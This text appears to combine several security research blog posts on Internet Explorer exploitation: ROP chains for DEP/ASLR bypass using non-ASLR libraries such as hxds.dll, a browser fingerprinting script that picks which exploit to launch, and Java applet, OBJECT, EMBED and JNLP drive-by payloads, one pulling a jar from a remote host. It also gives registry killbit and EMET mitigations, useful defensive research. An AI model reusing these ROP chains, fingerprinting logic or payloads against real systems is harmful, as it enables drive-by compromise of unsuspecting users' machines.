 0x28027b5c   # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)
 0x28024f71   # POP EAX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x280b4654   # ADD EAX,5EC0325F # RETN
 0x28099a83   # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)
 0x41414141   # Compensate
 0x28017271   # POP ECX # RETN
 0x280de198   # VirtualProtect() pointer [IAT]
 0x28027b5b   # MOV EAX,DWORD PTR DS:[ECX] # RETN
 0x28041824   # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08
 0x2806405a   # POP EBP # RETN
 0x41414141   # Compensate
 0x41414141   # Compensate
 0x280bc55b   # & push esp # ret 
 0x28017271   # POP ECX # RETN
 0x28126717   # &Writable location
 0x28098730   # POP EDI # RETN
 0x28098731   # RETN (ROP NOP)
 0x28024f71   # POP EAX # RETN
 0x90909090   # nop
 0x28043527   # PUSHAD # RETN

I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911

Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP 🙂

On something off topic, I was looking at the html code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure).

For Office 2010 it installs 4 OpenDocuments ActiveX objects

SharePoint.OpenDocuments.4
SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

and Office 2007 only 3

SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4” then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share.

<HTML>
<SCRIPT language="JavaScript"> 
//
//
if (CheckIEOSVersion() == "ie8w7")
{
   if (CheckOfficeVersion() == "Office2010")
   {
//     Exploit call here
   }
   else if (CheckOfficeVersion() == "Office2007")
   {
//     Exploit call here
   }
   else if (JavaVersion() == "Java6")
   {
//     Exploit call here
   }
   else if (SkypeCheck() == "")
   {
//     Exploit call here
   }
}
//
//
function CheckIEOSVersion()
{
   var agent = navigator.userAgent.toUpperCase();
   var os_ie_ver = "";
//
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) 
      os_ie_ver = "ie7wxp";  
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1))
      os_ie_ver = "ie8wxp";
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1))
      os_ie_ver = "ie7wv";   
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8wv";
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8w7";   
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) 
      os_ie_ver = "ie9w7";
   if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) 
      os_ie_ver = "ie10w8"; 
   return os_ie_ver;
}
//
//
function CheckOfficeVersion()
{
   var offver = "";
   var checka = 0;
   var checkb = 0;
//
   try {
         checka = new ActiveXObject("SharePoint.OpenDocuments.4");  
   } catch (e) {}
   try {
         checkb = new ActiveXObject("SharePoint.OpenDocuments.3");  
   } catch (e) {}
//
   if ((typeof checka) == "object" && (typeof checkb) == "object")
     offver = "Office2010";
   else if ((typeof checka) == "number" && (typeof checkb) == "object") 
     offver = "Office2007";
//
   return offver;
}
//
//
function JavaVersion() 
{
   var javver = "";
   var javaa = 0;
//
   try {
         javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0");  
   } catch (e) {}
//
   if ((typeof javaa) == "object")
       javver = "Java6";
//
   return javver;
}
//
//
function SkypeCheck()
{
   var skypever = "";
   return skypever;
}
//
//
</SCRIPT>
</HTML> 

Exploiting and mitigating Java exploits in Internet Explorer

This year we’ve seen a number of 0 day Java exploits surfacing and various mitigating steps mentioned in various sites that could be taken to prevent us from being compromised. A lot of these mitigating steps vary from each other so when it comes to mitigate Java in Internet Explorer it adds doubt to which is the best mitigation steps to follow. Uninstalling Java would obviously solve the problem but that is not really an option in organisations dependant on Java.

This post describes the mitigating steps available, the tests carried out and how to bypass certain mitigations. The tests have been carried out on a fully patched Windows 7 Enterprise 32bit virtual machine with Internet Explorer 8 and a vulnerable version of Java.

Prevent loading of applet in IE’s “Internet Zone”
This setting disables the loading of Java applets from the Internet zone. There are different keys representing different security zones [3] and the Internet zone has a value of 3.

; First set the URLAction to control APPLET behavior
; Zone 3 is the Internet zone
; 1C00 is the Java invocation policy
; "1C00"=dword:00000000 <-- disable loading of Java applet
; "1C00"=dword:00010000 <-- enable loading of Java applet
;
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1C00"=dword:00000000

HKEY_CURRENT_USER (HKCU) entry would take priority first. So if disabled in HKEY_LOCAL_MACHINE (HKLM) but enabled in HKCU then you will still be exploited so it is best just to apply the change in HKCU. Any external site attempting to use an applet tag will now not load the applet and a notification bar will be displayed.


This mitigation would only protect from applet tag examples below. With other techniques this mitigation is ineffective.

<APPLET archive="calc.jar" code="Exploit.class" width="1" height="1"></APPLET>
<APPLET code="Exploit.class" width="1" height="1"></APPLET>

Prevent loading of applet in all IE zones
This settings stops the loading of Java in all IE browser zones. This might be a problem internally in organisations which depend on the applet tag.

; "UseJava2IExplorer"=dword:00000000 <-- disable loading of Java applet
; "UseJava2IExplorer"=dword:00000001 <-- enable loading of Java applet
;
[HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\10.7.2]
"UseJava2IExplorer"=dword:00000000

An issue with this mitigation is that each time Java is installed the mitigation gets reset to its default value as a new Java version registry key is added.

10.4.0 – Java 7 update 4
10.6.2 – Java 7 update 6
10.7.2 – Java 7 update 7
10.9.2 – Java 7 update 9

Once mitigation has been made a popup would be seen first time.

If the check box is ticked “Do not show this message again” it writes to the registry entry below

[HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Declined Install On Demand IEv5]
"{08B0e5c0-4FCB-11CF-AAA5-00401C608501}"=""

This mitigation only stops exploits using the applet tag, cannot be managed by Internet Explorer zones and any new Java update means you’ll need to update the registry again.

Invoking Java classids via OBJECT tag
Internet Explorer can use the classid attribute OBJECT tag to load Java. Hundreds of Java classids gets registered when Java is installed. One classid is particularly dangerous as it works transparently from the Internet zone without any notification bars or alerts and has been used in actual exploits. The reason being is that this classid gets added in the preapproved list.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{8AD9C840-044E-11D1-B3E9-00805F499D93}

This classid calls the latest installed version of Java Plug-in installed on the machine. Whats interesting is that this classid is already added in Windows 7 preapproved registy key without even Java being installed. To mitigate this classid needs to be killbitted

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
"Compatibility Flags"=dword:00000400

To exploit it can be called like this

<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1">
  <PARAM name="code" value="Exploit.class">
</OBJECT>

Another way to mitigate this classid is to disable the Java Plugin’s ActiveX control through IE’s “Manage Add-ons”.

Once disabled it writes to the registry below and settings are retained even after a Java update though I prefer the killbit option.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
"Flags"=dword:00000001
"Version"="*"

The hundreds of other classids are mainly for backwards compatibility. So if an older specific version of Java is installed, those can be called using a specific classid, in the example below its calling Java 7 update 7

<OBJECT classid="clsid:CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA" width="1" height="1">
  <PARAM name="code" value="Exploit.class">
</OBJECT>

Or to invoke the latest Java 7 version installed

<OBJECT classid="clsid:CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA" width="1" height="1">
  <PARAM name="code" value="Exploit.class">
</OBJECT>

The way the classid versions is worked out is in say CAFEEFAC-xxxx-yyyy-zzzz-ABCDEFFEDCBA, “xxxx”, “yyyy”, and “zzzz” are four-digit numbers to identify the specific version of Java Plug-in to be used. In references [1][2] only a handful of classid’s listed below but actually when Java gets installed it installs hundreds of classids. Click here to see all the CAFEEFAC- classid’s registered on a Java 7 update 4 installation. In these references just killbitting these classids does not make sense as invoking any other classid will give the same two prompts as these ones. (screenshots given further down in  the Java Web Start ActiveX control section). So if you are thinking of killbitting these classids then follow Cert’s recommendation [4] as it kills all classids upto a certain version. A Java update will register newer classids each time so if killbitting these is an option you prefer then you’ll need to keep uptodate.

These classid’s are the only ones mentioned for Java version 7 and upto update 6.

CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0001-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0002-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0003-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0004-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0005-FFFF-ABCDEFFEDCBA
CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA
CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA

So CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA might have been killbitted but if you know the Java version you are attacking you could use

CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA
CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB
CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC

Another classid registered invokes an old version of Java and to exploit using this classid you’ll have to deal with a third warning window prompt and thiswould come up everytime.
 

To exploit

<HTML>
<OBJECT CLASSID="clsid:E19F9331-3110-11D4-991C-005004D3B3DB" width="1" height="1">
  <PARAM name="code" value="Exploit.class">
</OBJECT>
</HTML>

And to mitigate killbit the control

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}]
"Compatibility Flags"=dword:00000400

Loading Java via the EMBED tag
Java can also be exploited in Internet Explorer using the EMBED tag. Here applet mitigations is ineffective but killbitting/disabling the ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 as mentioned in previous section mitigates it.

To exploit

<HTML>
  <EMBED code="Exploit.class" type="application/x-java-applet" width="1" height="1"></EMBED>
</HTML>

Here the the mimetype “application/x-java-applet” points back to classid 8AD9C840-044E-11D1-B3E9-00805F499D93

Prevent automatically opening JNLP files via APPLET
Java Network Launch Protocol (JNLP) could also be used for launching applets directly from JNLP files. To launch an applet from a JNLP file the “jnlp_href” parameter would need to be used in the applet tag. This could be used in a transparent driveby attack too.

<HTML>
  <APPLET><param name="jnlp_href" value="mycalc.jnlp"></APPLET>
</HTML>

The jnlp file doesnt need to contain the full url path

<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="mycalc.jnlp">
     <information>
       <title>Calculator</title>
       <vendor>POC</vendor>
     </information>
     <resources>
       <j2se version="1.7+" />
       <jar href="calc.jar" main="true" />
     </resources>
     <applet-desc
         name="Calculator"
         main-class="Exploit"
         width="1"
         height="1">
     </applet-desc>
</jnlp>

When calling the jnlp file via the html file the jnlp file can be any extension so say in the above code mycalc.jnlp could be called mycalc.txt. Since this uses the applet tag the above mitigation on the applet would mitigate this threat.

Double-clicking on a JNLP file
Even with all the browser mitigations in place it doesnt stop an attacker to email a jnlp file to the victim. Just by double-clicking the attachment would compromise the machine.

<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="mycalc.jnlp">
     <information>
       <title>Calculator</title>
       <vendor>POC</vendor>
     </information>
     <resources>
       <j2se version="1.7+" />
       <jar href="http://192.168.1.3/calc.jar" main="true"/>
     </resources>
     <applet-desc
         name="Calculator"
         main-class="Exploit"
         width="1"
         height="1">
     </applet-desc>
</jnlp>

One way to mitigate is to change the file association and/or block jnlp file attachments on your mail relays.

HKLM\SOFTWARE\Classes\JNLPFile\Shell\Open\Command\: “”C:\Program Files\Java\jre7\bin\javaws.exe” “%1″”

Prevent automatically opening JNLP files via mimetype association
Using Java Web Start can be used to open a JNLP file. By default JNLP files open without any interaction from the user. For this to be exploited the web server would have to be configured with the .jnlp file extension to the mimetype “application/x-java-jnlp-file”. Then simply visiting a link say http://192.168.1.3/mycalc.jnlp would compromise your box.

<?xml version="1.0" encoding="utf-8"?>
<jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/">
  <information>
    <title>Calculator</title>
    <vendor>POC</vendor>
  </information>
  <resources>
    <j2se version="1.7+"/>
    <jar href="calc.jar" main="true"/>
  </resources>
  <applet-desc
         name="Calculator"
         main-class="Exploit"
         width="1"
         height="1">
  </applet-desc>
</jnlp>

Signing your own app and using jnlp code below could be used but user interaction is required and you don’t need a vulnerability for this one.

<?xml version="1.0" encoding="utf-8"?>
<jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/">
  <information>
    <title>Calculator</title>
    <vendor>POC</vendor>
  </information>
  <security>
    <all-permissions/>
  </security>
  <resources>
    <jar href="mycalc_signed.jar" main="true"/>
  </resources>
  <application-desc
         name="Calculator"
         main-class="mycalc"
         width="1"
         height="1">
  </application-desc>
</jnlp>

To mitigate we can change the default setting of EditFlags to all zeros which will then prompt the user.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile]
"EditFlags"=dword:00000000

On the Cert advisory EditFlags is a binary value but a dword value can also be used.

Prevent automatically opening JNLP files via ActiveX Control
Using Java Web Start ActiveX control can also be used to run a JNLP file but user interaction is required.

.

To exploit

<HTML>
<OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" width="1" height="1">
  <PARAM name="app" value="http://192.168.1.3/mycalc.jnlp">
</OBJECT>
</HTML>

and the JNLP file is

<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="mycalc.jnlp">
     <information>
       <title>Calculator</title>
       <vendor>POC</vendor>
     </information>
     <resources>
       <j2se version="1.7+" />
       <jar href="calc.jar" main="true" />
     </resources>
     <applet-desc
         name="Calculator"
         main-class="Exploit"
         width="1"
         height="1">
     </applet-desc>
</jnlp>

To mitigate killbit this classid

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}]
"Compatibility Flags"=dword:00000400

Java Deployment Toolkit ActiveX Controls
This Java Deployment Toolkit classid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA was exploited in 2010 (CVE-2010-1423). On a fully patched Windows 7 machine this has already been killbitted without even Java being installed and points to an alternate classid CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA. This classid has been killbitted in Cert’s mitigation so its recommended to keep this one killbitted too.

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}]
"Compatibility Flags"=dword:00000400

Preventing compromise
So what it comes down to is just these few changes on your system prevent it from being compromised automatically by a drive by attack.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile]
"EditFlags"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1C00"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}]
"Compatibility Flags"=dword:00000400

Renaming the “jp2iexp.dll” file would also temporarily mitigate the APPLET and OBJECT tag attack vectors but not the others mentioned. A Java update installation would drop the file back though so bear that in mind.

Other classids that would need some interaction are also best to be killbitted

[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}]
"Compatibility Flags"=dword:00000400

Using the latest classids for the Java version would require the user to acknowledge two warnings but once accepted thereafter no warning would be given so killbitting the CAFAEFAC- classids might be worth thinking about in your managed environment. Finally JNLP files could be sent via email so you might want to take a proactive step in blocking jnlp file attachments on your mail relays.

Latest Java release
Following the release of Java 7 update 10 last week I thought I’d do a quick check on its new security features. There is now an updated security tab giving the user now more control on what to do.

Changing the security levels makes changes to the file deployment.properties in location

C:\Users\user1\AppData\LocalLow\Sun\Java\Deployment

By default its set to medium but if changed to low the entry deployment.security.level=LOW is added to the file. Since this is in a low integrity folder this could be changed to LOW settings by a low privileged user.

#deployment.properties
#Wed Dec 19 17:48:16 GMT 2012
deployment.modified.timestamp=1355939296772
deployment.version=7.0
deployment.security.level=LOW
deployment.webjava.enabled=false
#Java Deployment jre's
#Wed Dec 19 17:48:16 GMT 2012
deployment.javaws.jre.0.registered=true
deployment.javaws.jre.0.platform=1.7
deployment.javaws.jre.0.osname=Windows
deployment.javaws.jre.0.path=C\:\\Program Files\\Java\\jre7\\bin\\javaw.exe
deployment.javaws.jre.0.product=1.7.0_10
deployment.javaws.jre.0.osarch=x86
deployment.javaws.jre.0.location=http\://java.sun.com/products/autodl/j2se
deployment.javaws.jre.0.enabled=true
deployment.javaws.jre.0.args=

Un-checking the “Enable Java content in the browser” is quite drastic step as it deletes all classids, mimetypes, jnlp file association, etc. The command that gets run when un-checking and applying is

"C:\PROGRA~1\Java\jre7\bin\ssvagent.exe"  -disablewebjava

This feature would most definitely protect from browser based attacks but also most likely break all your internal apps so not something to implement without thorough testing in an enterprise environment. For home users it gives the flexibility to enable and disable when needed say if you want to do a vulnerability scan which uses Java.

Conclusion
This research has shown that if you dont need Java best to just to uninstall it. If there is a requirement then upgrade to Java 7u10 and uncheck the Java content in the browser settings. Finally follow only Certs advisory [4] or the very least make the few mitigating changes mentioned in the “Preventing compromise” section regardless if you have “Java Content in the browser” enabled or disabled.

References:

[1] http://nakedsecurity.sophos.com/how-to-disable-java-internet-explorer/
[2] http://support.microsoft.com/kb/2751647
[3] http://support.microsoft.com/kb/182569
[4] http://www.kb.cert.org/vuls/id/636312
[5] http://krebsonsecurity.com/how-to-unplug-java-from-the-browser/
[6] http://blogs.msdn.com/b/ieinternals/archive/2011/05/15/controlling-java-in-internet-explorer.aspx
[7] http://docs.oracle.com/javase/1.5.0/docs/guide/plugin/developer_guide/using_tags.html
[9] http://www.oracle.com/technetwork/java/javase/documentation/developersguide-138587.html
[10] http://docs.oracle.com/javase/7/docs/technotes/guides/javaws/developersguide/syntax.html
[11] http://www.oracle.com/technetwork/java/javase/index-142562.html
[12] http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html

Bypassing Microsoft Windows ASLR with a little help by MS-Help

Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed as it got shipped with non aslr msvcr71.dll library. Now that Java 7 has been out for a while hopefully everyone should be using this version as msvcr71.dll does not exist with Java 7. With this in mind creating a reliable ROP chain is going to be difficult again as finding some information leak my guess is not going to be a straight forward not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office.

Windows 7 only

After carrying out a default installation of Windows 7 sp1 (Enterprise) and getting it all up-to-date with patches I carried out a scan of all non aslr DLLs on the system and was amazed to find nearly 600 non alsr DLLs. Ok a lot were duplicates so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag so after searching for clsid string in the DLLs one library stood out “VsaVb7rt.dll”

Filename - VsaVb7rt.dll
Path     - C:\Windows\Microsoft.NET\Framework\v2.0.50727\
MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c
Size     - 1,340,752 bytes
Signed   - 29th September 2010 08:46:12

After obtaining the classid guid using the tool Bintext I loaded it up in the browser

<HTML>
<OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F' </OBJECT>
</HTML>

The issue with loading libraries via guids is that user interaction is first required before exploiting so in the real world this would not be a viable option unless your testing your own exploits from a specific address.

Once accepting the security warning it writes to the registry entry below

Windows 7 with MSOffice 2007/2010

With Windows 7 being a failure I turned my attention to Office 2007. As most users running Windows 7 should be running Office 2010 or the very least running Office 2007. After a default installation of “Microsoft Office 2007 Plus”, getting it fully up-to-date and carrying a another scan a number of additional non aslr DLLs where found that could be loaded via its own guids as above but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction and that library being “hxds.dll” :-). This library can be loaded using its protocol handler by location.href = ‘ms-help:’

<SCRIPT language="JavaScript"> 
   location.href = 'ms-help:'
</SCRIPT>

This library does not get rebased either so is perfect for our ROP chain. Carrying out the same routine with “Microsoft Office 2010 Plus” I found the same library “hxds.dll” that we can use but our ROP chain would be different as the file has been updated.

Details of the library on Office 2007

Filename - hxds.dll
Path     - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8
Size     - 873,216 bytes
Signed   - 19th August 2006 11:52:41

Details of the library on Office 2010

Filename - hxds.dll
Path     - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83
Size     - 877,368 bytes
Signed   - 23rd May 2009 12:24:33

Here is the ROP chain generated by Mona.py on Office 2007

 0x51be25dc, # POP EDI # RETN [hxds.dll]
 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
 0x51bf1761, # POP EBP # RETN [hxds.dll]
 0x51c4b2df, # & call esp [hxds.dll]
 0x51bf2e19, # POP EBX # RETN [hxds.dll]
 0x00000201, # 0x00000201-> ebx
 0x51bfa969, # POP EDX # RETN [hxds.dll]
 0x00000040, # 0x00000040-> edx
 0x51c385a2, # POP ECX # RETN [hxds.dll]
 0x51c5b991, # &Writable location [hxds.dll]
 0x51bf7b52, # POP EDI # RETN [hxds.dll]
 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
 0x51c433d7, # POP EAX # RETN [hxds.dll]
 0x90909090, # nop
 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]

and the ROP chain on Office 2010

 0x51bf34b4, # POP ESI # RETN [hxds.dll]
 0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll]
 0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]
 0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll]
 0x51c379e2, # POP EBP # RETN [hxds.dll]
 0x51c59683, # & call esp [hxds.dll]
 0x51be198c, # POP EBX # RETN [hxds.dll]
 0x00000201, # 0x00000201-> ebx
 0x51c35ac3, # POP EDX # RETN [hxds.dll]
 0x00000040, # 0x00000040-> edx
 0x51becf3e, # POP ECX # RETN [hxds.dll]
 0x51c5d150, # &Writable location [hxds.dll]
 0x51bef563, # POP EDI # RETN [hxds.dll]
 0x51c07402, # RETN (ROP NOP) [hxds.dll]
 0x51c56fbd, # POP EAX # RETN [hxds.dll]
 0x90909090, # nop
 0x51c3604e, # PUSHAD # RETN [hxds.dll]

In order for our exploit to be successful I’ve seen its best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally here is an exploit (password “answerworks”, md5hash 5bc94894890298710f30d91d6104e568) based from my last post where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll. For now I see two options to mitigate this, one is to disable the protocol handler which can be done easily by changing the name or value in the registry or delete it completely. The downside is that I don’t know how it would impact applications using this handler.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help]
@="Help HxProtocol"
"CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}"

The second option would be to get Microsoft EMET installed if you haven’t already done so and make sure “MandatoryASLR” is enabled for the iexplore.exe process. I can’t emphasize enough how vital it is to have this tool installed so please do not delay and get it deployed ASAP.